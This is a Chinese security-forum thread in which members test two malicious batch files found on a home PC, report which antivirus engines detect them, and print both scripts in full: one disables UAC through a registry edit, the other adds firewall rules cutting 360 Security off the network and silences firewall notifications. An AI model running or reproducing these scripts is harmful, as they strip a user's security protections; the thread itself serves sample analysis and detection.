家里电脑扫出的恶意批处理bat 2x

tony099

米店不卖大米通过QQ闪传分享了【Desktop.zip】
链接：https://qfile.qq.com/q/1AQDOrMNqM

心醉咖啡

360扫描miss

superLYT

一个bat解压杀，另外一个双击后无法运行

biue

腾讯电脑管家 2X

成顔

卡巴解压杀1.bat ，另一个双击后cmd闪了下没啥反应

莒县小哥

dd2006

华为 miss
红伞  miss
SEP miss

1.bat：这是禁用UAC吗？

1. [url=home.php?mod=space&uid=331734]@echo[/url] off
   
2. 
   
3. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
   
4. 
   
5. echo UAC has been disabled. Please restart your computer for the changes to take effect.

复制代码

fhq.bat：
1、少了个C:\ProgramData\lnk\123.txt文件
2、启用防火墙，修改防火墙规则，阻止“Block Program Network Access”联网（出入站）；
3、禁用系统通知；
4、禁止“360Safe.exe”联网？

1. @echo off
   
2. setlocal enabledelayedexpansion
   
3. 
   
4. :: 定义文本文件路径
   
5. set filePath=C:\ProgramData\lnk\123.txt
   
6. 
   
7. :: 初始化 path 变量
   
8. set pathVar=
   
9. 
   
10. :: 逐行读取文件内容并拼接（不在最后追加空格）
    
11. for /f "delims=" %%i in (%filePath%) do (
    
12.     set "pathVar=!pathVar!%%i"
    
13. )
    
14. 
    
15. :: 去掉多余的首尾空格
    
16. for /f "tokens=* delims= " %%i in ("!pathVar!") do set pathVar=%%i
    
17. 
    
18. :: 显示文件内容结果
    
19. echo 文件内容为：!pathVar!
    
20. 
    
21. 
    
22. 
    
23. 
    
24. :: 设置要禁止联网的程序路径
    
25. set program_path=!pathVar!
    
26. 
    
27. :: 创建防火墙规则，阻止该程序的所有入站和出站连接
    
28. netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="%program_path%" enable=yes
    
29. netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="%program_path%" enable=yes
    
30. 
    
31. echo 已成功创建防火墙规则，阻止程序联网。
    
32. ///////////////////////////
    
33. 
    
34. 
    
35. :: 设置完整路径
    
36. set file_path=!pathVar!
    
37. 
    
38. :: 去掉 "safemon\360tray.exe" 部分
    
39. set modified_path=%file_path:safemon\360tray.exe=%
    
40. 
    
41. :: 输出修改后的路径
    
42. echo 修改后的路径是: %modified_path%360Safe.exe
    
43. 
    
44. 
    
45. 
    
46. 
    
47. :: 设置要禁止联网的程序路径
    
48. set program_path2=%modified_path%360Safe.exe
    
49. 
    
50. :: 创建防火墙规则，阻止该程序的所有入站和出站连接
    
51. netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="%program_path2%" enable=yes
    
52. netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="%program_path2%" enable=yes
    
53. 
    
54. echo 已成功创建防火墙规则，阻止程序联网。
    
55. 
    
56. :: 开启防火墙命令
    
57. netsh advfirewall set allprofiles state on
    
58. 
    
59. :: 提示操作完成
    
60. 
    
61. 
    
62. :: 禁用所有网络配置文件的入站通知
    
63. netsh advfirewall set privateprofile settings inboundusernotification disable
    
64. netsh advfirewall set publicprofile settings inboundusernotification disable
    
65. netsh advfirewall set domainprofile settings inboundusernotification disable

复制代码

微微的笑

成顔 发表于 2025-11-20 00:58
卡巴解压杀1.bat ，另一个双击后cmd闪了下没啥反应

因为缺少123.txt

jxfaiu

解压秒杀1

Curve25519

ESET Smart Security Premium 解压 kill all

2025/11/20 16:11:57;文件系统实时防护;文件;\Device\TweakCubeRamDisk0\Sandbox\Admin\DefaultBox\drive\W\Desktop\1.bat;BAT/Disabler.NLA 特洛伊木马;已通过删除清除;DESKTOP-K07940I\Admin;在通过应用程序创建的新文件上发生了事件: C:\Program Files\WinRAR\WinRAR.exe (D150653D2058987677CD7ED3FF5344D9BA9D2739).;9E0C0737B0E37B3E821D011EECD9B0C7C9F2A15A;2025/9/10 15:14:28;S-1-5-21-1216372390-1976424117-2270819850-1001;
2025/11/20 16:11:57;文件系统实时防护;文件;\Device\TweakCubeRamDisk0\Sandbox\Admin\DefaultBox\drive\W\Desktop\fhq.bat;BAT/KillAV.NHS 特洛伊木马;已通过删除清除;DESKTOP-K07940I\Admin;在通过应用程序创建的新文件上发生了事件: C:\Program Files\WinRAR\WinRAR.exe (D150653D2058987677CD7ED3FF5344D9BA9D2739).;21CC730517D74FA1D13316D7E0D817F3BD710906;2025/9/10 15:14:28;S-1-5-21-1216372390-1976424117-2270819850-1001;